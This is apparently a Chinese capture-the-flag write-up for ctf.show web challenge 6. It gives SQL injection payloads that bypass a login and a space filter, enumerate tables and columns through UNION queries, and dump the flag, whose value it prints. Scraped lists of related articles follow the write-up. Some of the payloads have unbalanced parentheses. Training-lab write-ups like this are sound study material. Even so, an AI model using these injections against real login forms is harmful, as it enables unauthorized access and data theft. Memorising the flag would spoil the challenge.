ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过

先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输

a'or(true)#

成功登录

既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输

a'or(true)union(select(1),database(),3)#

当前数据库是web2

接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错

a'or(true)union(select(1),
(select(group_concat(table_name))from(information_schema.tables)
where(table_schema='web2'))
,3)#

成功获取数据库中的表 flag , user

很明显flag就在flag这个表中,接下来我们获取flag表的所有字段,用户名输入以下payload,密码随便输,如果直接赋值payload,记得删掉内容中的空格和换行符,否则会报错

a'or(true)union(select(1),
select(group_concat(column_name))from(information_schema.columns)
where(table_schema='web2')and(table_name='flag'))
,3)#

成功获取表中字段flag

接下来就是获取flag表中的数据了,用户名输入以下payload,密码随便输

a'or(true)union(select(1),(select(flag)from(flag)),3)#

把整个内容复制到输入框中提交flag,即可过关

ctfshow{4cd84cfd-e43c-40f0-86df-d11bf6c2c50c}

ctfshow-WEB-web6相关推荐

1. CTFShow web入门题刷题记录

   CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998 ...

2. ctfshow web入门-sql注入

   ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...

3. [ctfshow]web入门——文件上传（web156-web163）

   [ctfshow]web入门--文件上传(web156-web163) [ctfshow]web入门--文件上传 [ctfshow]web入门--文件上传(web156-web163) web156 ...

4. 无字母数字rce(ctfshow web入门56)

   无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET[' ...

5. [ctfshow web入门]常用姿势801-806

   1NDEX 0x00 前言 801 flask pin码计算 谨记!!python 3.8和3.6 pin码生成方式不同 werkzeug版本不同machine-id获取不同 python3.8 pi ...

6. ctfshow web入门-XXE

   ctfshow web入门-XXE web373 题目描述 解题思路 web374 题目描述 解题思路 web375 题目描述 解题思路 web376 题目描述 解题思路 web377 题目描述 解题 ...

7. ctfshow web入门 命令执行 web29~web77 web118~web124

   目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...

8. ctfshow web入门 反序列化 前篇 254-266

   这里266后面主要是框架,以后在讲 反序列化入门可以参考我写的另一篇很详细的哦~php 反序列化总结 web254 <?phperror_reporting(0); highlight_file ...

9. Ctfshow web入门 爆破系列 21~28

   目录 Ctfshow web 21 Ctfshow web 22 Ctfshow web 23 Ctfshow web 24 Ctfshow web 25 Ctfshow web 26 Ctfshow ...

10. CTFSHOW WEB 1-100

    web入门 给她 1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 <?php ...

最新文章

1. 新兴短距离无线通信技术ZigBee入门到进阶
2. 表单form数据默认以键值对的形式将数据回发到服务器，回发非纯文本需使用enctype=multipart/form-data方式编码为整条消息...
3. 【Python学习】 - 超详细的零基础Pandas学习（附Python数据分析与应用课本第四章实训答案）
4. LeetCode（463）——岛屿的周长（JavaScript）
5. jbod ugood 磁盘驱动状态_NTFS磁盘读写工具Mounty免费版
6. 比尔盖茨：十条“金口玉言”－－ 世界不会在意你的自尊
7. Linux系统和windows系统mysql5.7.32的下载
8. Oracle使用技巧及PL/SQL Developer配置
9. PHPKafka 1.0 发布，支持全部 50 个 API
10. IIS无法启动解决方案
11. 经纬度在线查询 地名 批量 查询经纬度 经纬度 批量 查询地名
12. Java相关证书，你考过哪个？
13. 干货 | 教你打造一款颜值逆天的VS Code
14. 细胞衰老——酪氨酸激酶抑制剂
15. unity摄像头实物识别_MAD Gaze推出人脸识别AR智能眼镜＋AI安防方案赋能智慧城市...
16. 计算机与信息学院迎新标语,学院迎新标语横幅
17. matlab偏差补偿最小二乘,基于偏差补偿递推最小二乘的Hammerstein-Wiener模型辨识
18. hdu校赛—1004
19. Theano的安装及GPU的配置
20. word中四号字体对应于14pt，其他字号如下

热门文章

1. Python通过正则表达式去除(过滤)HTML标签，提取文字
2. mysql中使用case when语句
3. 软工视频（33~36）-用户界面设计
4. C++ 内嵌汇编 实现 加法操作
5. 大数据之-Hadoop3.x_MapReduce_数据压缩_案例实现---大数据之hadoop3.x工作笔记0139
6. Sharding-JDBC水平分库(水平数据库分片策略配置)_Sharding-Sphere，Sharding-JDBC分布式_分库分表工作笔记010
7. SpringCloud工作笔记070---SpringCloud中使用Redis存储List类型数据
8. printf(%d,5.01)和printf(%f,5)的输出结果
9. win7下看不到摄像头的解决方法
10. 动态修改路由_tutorial第二部分-路由参数